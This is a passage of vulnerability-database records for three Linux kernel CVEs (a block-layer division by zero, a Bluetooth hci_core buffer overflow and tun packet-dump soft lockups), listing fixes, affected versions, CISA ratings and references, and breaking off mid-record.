CVE-2024-35925 (GCVE-0-2024-35925)
Vulnerability from cvelistv5
Published
2024-05-19 10:10
Modified
2025-05-04 09:08
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
block: prevent division by zero in blk_rq_stat_sum()
The expression dst->nr_samples + src->nr_samples may
have zero value on overflow. It is necessary to add
a check to avoid division by zero.
Found by Linux Verification Center (linuxtesting.org) with Svace.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35925",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T15:10:44.680403Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:55.338Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.052Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6a55dab4ac956deb23690eedd74e70b892a378e7"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21e7d72d0cfcbae6042d498ea2e6f395311767f8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/512a01da7134bac8f8b373506011e8aaa3283854"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5f7fd6aa4c4877d77133ea86c14cf256f390b2fe"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/98ddf2604ade2d954bf5ec193600d5274a43fd68"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93f52fbeaf4b676b21acfe42a5152620e6770d02"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"block/blk-stat.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6a55dab4ac956deb23690eedd74e70b892a378e7",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "21e7d72d0cfcbae6042d498ea2e6f395311767f8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "512a01da7134bac8f8b373506011e8aaa3283854",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "5f7fd6aa4c4877d77133ea86c14cf256f390b2fe",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "98ddf2604ade2d954bf5ec193600d5274a43fd68",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "93f52fbeaf4b676b21acfe42a5152620e6770d02",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"block/blk-stat.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.312",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.6",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.312",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.27",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: prevent division by zero in blk_rq_stat_sum()\n\nThe expression dst-\u003enr_samples + src-\u003enr_samples may\nhave zero value on overflow. It is necessary to add\na check to avoid division by zero.\n\nFound by Linux Verification Center (linuxtesting.org) with Svace."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:08:29.916Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6a55dab4ac956deb23690eedd74e70b892a378e7"
},
{
"url": "https://git.kernel.org/stable/c/edd073c78d2bf48c5b8bf435bbc3d61d6e7c6c14"
},
{
"url": "https://git.kernel.org/stable/c/b0cb5564c3e8e0ee0a2d28c86fa7f02e82d64c3c"
},
{
"url": "https://git.kernel.org/stable/c/21e7d72d0cfcbae6042d498ea2e6f395311767f8"
},
{
"url": "https://git.kernel.org/stable/c/512a01da7134bac8f8b373506011e8aaa3283854"
},
{
"url": "https://git.kernel.org/stable/c/5f7fd6aa4c4877d77133ea86c14cf256f390b2fe"
},
{
"url": "https://git.kernel.org/stable/c/98ddf2604ade2d954bf5ec193600d5274a43fd68"
},
{
"url": "https://git.kernel.org/stable/c/93f52fbeaf4b676b21acfe42a5152620e6770d02"
}
],
"title": "block: prevent division by zero in blk_rq_stat_sum()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35925",
"datePublished": "2024-05-19T10:10:35.708Z",
"dateReserved": "2024-05-17T13:50:33.126Z",
"dateUpdated": "2025-05-04T09:08:29.916Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26889 (GCVE-0-2024-26889)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-07 19:59
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_core: Fix possible buffer overflow
struct hci_dev_info has a fixed size name[8] field so in the event that
hdev->name is bigger than that strcpy would attempt to write past its
size, so this fixes this problem by switching to use strscpy.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 194ab82c1ea187512ff2f822124bd05b63fc9f76 Version: b48595f5b1c6e81e06e164e7d2b7a30b1776161e Version: ffb060b136dd75a033ced0fc0aed2882c02e8b56 Version: bbec1724519ecd9c468d1186a8f30b7567175bfb Version: dcda165706b9fbfd685898d46a6749d7d397e0c0 Version: dcda165706b9fbfd685898d46a6749d7d397e0c0 Version: dcda165706b9fbfd685898d46a6749d7d397e0c0 Version: dcda165706b9fbfd685898d46a6749d7d397e0c0 Version: d9ce7d438366431e5688be98d8680336ce0a0f8d Version: a55d53ad5c86aee3f6da50ee73626008997673fa Version: 5558f4312dca43cebfb9a1aab3d632be91bbb736 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.187Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6d5a9d4a7bcbb7534ce45a18a52e7bd23e69d8ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/54a03e4ac1a41edf8a5087bd59f8241b0de96d3d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d47e6c1932cee02954ea588c9f09fd5ecefeadfc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e845867b4e279eff0a19ade253390470e07e8a1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68644bf5ec6baaff40fc39b3529c874bfda709bd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a41c8efe659caed0e21422876bbb6b73c15b5244"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8c28598a2c29201d2ba7fc37539a7d41c264fb10"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2edce8e9a99dd5e4404259d52e754fdc97fb42c2"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/81137162bfaa7278785b24c1fd2e9e74f082e8e4"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26889",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-11T21:45:31.651235Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-120",
"description": "CWE-120 Buffer Copy without Checking Size of Input (\u0027Classic Buffer Overflow\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-07T19:59:25.169Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "6d5a9d4a7bcbb7534ce45a18a52e7bd23e69d8ac",
"status": "affected",
"version": "194ab82c1ea187512ff2f822124bd05b63fc9f76",
"versionType": "git"
},
{
"lessThan": "54a03e4ac1a41edf8a5087bd59f8241b0de96d3d",
"status": "affected",
"version": "b48595f5b1c6e81e06e164e7d2b7a30b1776161e",
"versionType": "git"
},
{
"lessThan": "d47e6c1932cee02954ea588c9f09fd5ecefeadfc",
"status": "affected",
"version": "ffb060b136dd75a033ced0fc0aed2882c02e8b56",
"versionType": "git"
},
{
"lessThan": "2e845867b4e279eff0a19ade253390470e07e8a1",
"status": "affected",
"version": "bbec1724519ecd9c468d1186a8f30b7567175bfb",
"versionType": "git"
},
{
"lessThan": "a41c8efe659caed0e21422876bbb6b73c15b5244",
"status": "affected",
"version": "dcda165706b9fbfd685898d46a6749d7d397e0c0",
"versionType": "git"
},
{
"lessThan": "8c28598a2c29201d2ba7fc37539a7d41c264fb10",
"status": "affected",
"version": "dcda165706b9fbfd685898d46a6749d7d397e0c0",
"versionType": "git"
},
{
"lessThan": "2edce8e9a99dd5e4404259d52e754fdc97fb42c2",
"status": "affected",
"version": "dcda165706b9fbfd685898d46a6749d7d397e0c0",
"versionType": "git"
},
{
"lessThan": "81137162bfaa7278785b24c1fd2e9e74f082e8e4",
"status": "affected",
"version": "dcda165706b9fbfd685898d46a6749d7d397e0c0",
"versionType": "git"
},
{
"status": "affected",
"version": "d9ce7d438366431e5688be98d8680336ce0a0f8d",
"versionType": "git"
},
{
"status": "affected",
"version": "a55d53ad5c86aee3f6da50ee73626008997673fa",
"versionType": "git"
},
{
"status": "affected",
"version": "5558f4312dca43cebfb9a1aab3d632be91bbb736",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/bluetooth/hci_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.19.297",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "5.4.259",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "5.10.199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "5.15.137",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.328",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.1.60",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_core: Fix possible buffer overflow\n\nstruct hci_dev_info has a fixed size name[8] field so in the event that\nhdev-\u003ename is bigger than that strcpy would attempt to write past its\nsize, so this fixes this problem by switching to use strscpy."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:55:05.384Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/6d5a9d4a7bcbb7534ce45a18a52e7bd23e69d8ac"
},
{
"url": "https://git.kernel.org/stable/c/54a03e4ac1a41edf8a5087bd59f8241b0de96d3d"
},
{
"url": "https://git.kernel.org/stable/c/d47e6c1932cee02954ea588c9f09fd5ecefeadfc"
},
{
"url": "https://git.kernel.org/stable/c/2e845867b4e279eff0a19ade253390470e07e8a1"
},
{
"url": "https://git.kernel.org/stable/c/a41c8efe659caed0e21422876bbb6b73c15b5244"
},
{
"url": "https://git.kernel.org/stable/c/8c28598a2c29201d2ba7fc37539a7d41c264fb10"
},
{
"url": "https://git.kernel.org/stable/c/2edce8e9a99dd5e4404259d52e754fdc97fb42c2"
},
{
"url": "https://git.kernel.org/stable/c/81137162bfaa7278785b24c1fd2e9e74f082e8e4"
}
],
"title": "Bluetooth: hci_core: Fix possible buffer overflow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26889",
"datePublished": "2024-04-17T10:27:42.814Z",
"dateReserved": "2024-02-19T14:20:24.186Z",
"dateUpdated": "2025-05-07T19:59:25.169Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27013 (GCVE-0-2024-27013)
Vulnerability from cvelistv5
Published
2024-05-01 05:29
Modified
2025-11-04 17:17
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tun: limit printing rate when illegal packet received by tun dev
vhost_worker will call tun call backs to receive packets. If too many
illegal packets arrives, tun_do_read will keep dumping packet contents.
When console is enabled, it will costs much more cpu time to dump
packet and soft lockup will be detected.
net_ratelimit mechanism can be used to limit the dumping rate.
PID: 33036 TASK: ffff949da6f20000 CPU: 23 COMMAND: "vhost-32980"
#0 [fffffe00003fce50] crash_nmi_callback at ffffffff89249253
#1 [fffffe00003fce58] nmi_handle at ffffffff89225fa3
#2 [fffffe00003fceb0] default_do_nmi at ffffffff8922642e
#3 [fffffe00003fced0] do_nmi at ffffffff8922660d
#4 [fffffe00003fcef0] end_repeat_nmi at ffffffff89c01663
[exception RIP: io_serial_in+20]
RIP: ffffffff89792594 RSP: ffffa655314979e8 RFLAGS: 00000002
RAX: ffffffff89792500 RBX: ffffffff8af428a0 RCX: 0000000000000000
RDX: 00000000000003fd RSI: 0000000000000005 RDI: ffffffff8af428a0
RBP: 0000000000002710 R8: 0000000000000004 R9: 000000000000000f
R10: 0000000000000000 R11: ffffffff8acbf64f R12: 0000000000000020
R13: ffffffff8acbf698 R14: 0000000000000058 R15: 0000000000000000
ORIG_RAX: ffffffffffffffff CS: 0010 SS: 0018
#5 [ffffa655314979e8] io_serial_in at ffffffff89792594
#6 [ffffa655314979e8] wait_for_xmitr at ffffffff89793470
#7 [ffffa65531497a08] serial8250_console_putchar at ffffffff897934f6
#8 [ffffa65531497a20] uart_console_write at ffffffff8978b605
#9 [ffffa65531497a48] serial8250_console_write at ffffffff89796558
#10 [ffffa65531497ac8] console_unlock at ffffffff89316124
#11 [ffffa65531497b10] vprintk_emit at ffffffff89317c07
#12 [ffffa65531497b68] printk at ffffffff89318306
#13 [ffffa65531497bc8] print_hex_dump at ffffffff89650765
#14 [ffffa65531497ca8] tun_do_read at ffffffffc0b06c27 [tun]
#15 [ffffa65531497d38] tun_recvmsg at ffffffffc0b06e34 [tun]
#16 [ffffa65531497d68] handle_rx at ffffffffc0c5d682 [vhost_net]
#17 [ffffa65531497ed0] vhost_worker at ffffffffc0c644dc [vhost]
#18 [ffffa65531497f10] kthread at ffffffff892d2e72
#19 [ffffa65531497f50] ret_from_fork at ffffffff89c0022f
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 Version: ef3db4a5954281bc1ea49a4739c88eaea091dc71 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27013",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-01T13:35:26.133742Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-05T17:22:49.101Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:17:07.558Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68459b8e3ee554ce71878af9eb69659b9462c588"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4b0dcae5c4797bf31c63011ed62917210d3fdac3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14cdb43dbc827e18ac7d5b30c5b4c676219f1421"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a50dbeca28acf7051dfa92786b85f704c75db6eb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/62e27ef18eb4f0d33bbae8e9ef56b99696a74713"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40f4ced305c6c47487d3cd8da54676e2acc1a6ad"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/52854101180beccdb9dc2077a3bea31b6ad48dfa"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f8bbc07ac535593139c875ffa19af924b1084540"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DAMSOZXJEPUOXW33WZYWCVAY7Z5S7OOY/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4EZ6PJW7VOZ224TD7N4JZNU6KV32ZJ53/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GCBZZEC7L7KTWWAS2NLJK6SO3IZIL4WW/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/tun.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "68459b8e3ee554ce71878af9eb69659b9462c588",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "4b0dcae5c4797bf31c63011ed62917210d3fdac3",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "14cdb43dbc827e18ac7d5b30c5b4c676219f1421",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "a50dbeca28acf7051dfa92786b85f704c75db6eb",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "62e27ef18eb4f0d33bbae8e9ef56b99696a74713",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "40f4ced305c6c47487d3cd8da54676e2acc1a6ad",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "52854101180beccdb9dc2077a3bea31b6ad48dfa",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
},
{
"lessThan": "f8bbc07ac535593139c875ffa19af924b1084540",
"status": "affected",
"version": "ef3db4a5954281bc1ea49a4739c88eaea091dc71",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/tun.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.35"
},
{
"lessThan": "2.6.35",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.157",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.88",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.29",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "2.6.35",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "2.6.35",
